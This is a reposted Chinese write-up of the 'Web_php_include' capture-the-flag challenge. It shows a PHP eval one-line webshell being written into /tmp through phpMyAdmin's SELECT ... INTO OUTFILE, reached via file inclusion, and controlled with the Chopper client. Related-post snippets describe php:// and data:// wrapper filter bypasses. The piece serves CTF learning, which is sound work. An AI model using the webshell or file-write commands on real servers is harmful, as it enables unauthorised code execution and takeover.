攻防世界 Web_php_include write up

最新推荐文章于 2024-03-25 22:33:08 发布
最新推荐文章于 2024-03-25 22:33:08 发布
阅读量1k 收藏
点赞数
文章标签: php 运维 数据库
原文链接:http://www.cnblogs.com/Zhu013/p/11550463.html
版权

攻防世界   Web_php_include   write up

dirbuster  扫目录   发现phpinfo()可以看到绝对路径   和  phpmyadmin

进入phpmyadmin页面   root直接空密码登录

查看phpmyadmin变量 secure file priv 值为空  说明可以写入一句话

load_file()可以读取任意文件

.......在经过各种尝试写人一句话再用文件包含读取的过程中.发现权限有各种限制。
.......因为page可以直接包含phpinfo()页面显示,所以以phpinfo()为测试,测试到/tmp 目录可以写入,也可以包含读取。
    于是将一句话写入/tmp,菜刀链接文件包含页面,得到flag


<?php eval(@$_POST['flag']); ?>

select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/lib/mysql/test1.php'  能写入,无法包含。
select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/www/test1.php'  无法写入
............
...........
.......

 

select "<?php eval(@$_POST['flag']); ?>"into outfile '/tmp/test.php'  可以写入

http://111.198.29.45:36252/?page=/tmp/test.php 菜刀链接

 

 

 

 

 


....

 

 

 



转载于:https://www.cnblogs.com/Zhu013/p/11550463.html

weixin_30872157
关注
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9993
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4685
ctf学习记录
攻防世界-web-Web_php_include(文件包含与伪协议)
2301_77300311的博客
05-04 622
先进行base64编码再urlencode后,构造data://伪协议,payload如下。strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。由于strstr()函数和函数都是区分大小写的,那么我们完全可以使用大写的PHP://来绕过过滤。既然过滤了php://的伪协议,我们可以使用其他协议,这里使用data://伪协议。从代码中得知,page参数中带有php://的都会被替换成空。方法三(php://伪协议、大小写过滤)方法二(御剑+菜刀)
Web_php_include总结五种解法大同小异
yingyugo的博客
11-18 3429
Web_php_include解题详解 ————一念既出,万山无阻 分析——解题——总结 1.分析 代码不长,咱们慢慢分析 第一句是语法高亮,show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。 第二句是get 传给hello参数这里可以构造payload: /?hel
攻防世界Web_php_unserialize(超详细WP)
金 帛的博客
03-02 3438
攻防世界WP
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
Web_php_include
怪味巧克力的博客
05-25 4298
知识点: 1.strstr(): 定义和用法: strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。 该函数是区分大小写的, stristr() 函数不区分大小写。 语法 strstr(string,search,before_search) 参数 描述 string 必需。规定被搜索的字符串。 search 必需。规定要搜索的字符串。如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符。 before_searc
Web_php_include-攻防世界
最新发布
szhangliwenya的博客
03-25 1195
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5888
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
Web_php_include-xctf
qq_43660551的博客
07-03 992
RCE-PHP
Web_php_unserialize(攻防世界
m0_70819573的博客
02-21 385
PHP5 < 5.6.25, PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过。2.主要有两个可绕过的点,preg_match和_wake up的绕过。(2)preg_match绕过。(1)_wake up的绕过。1.打开环境,审计代码。
攻防世界Web_php_unserialize
qq_45955869的博客
05-26 129
提示:攻防世界Web_php_unserialize。
WEBWeb_php_include(多解)
sleepywin的博客
07-16 1204
解题
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 478
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值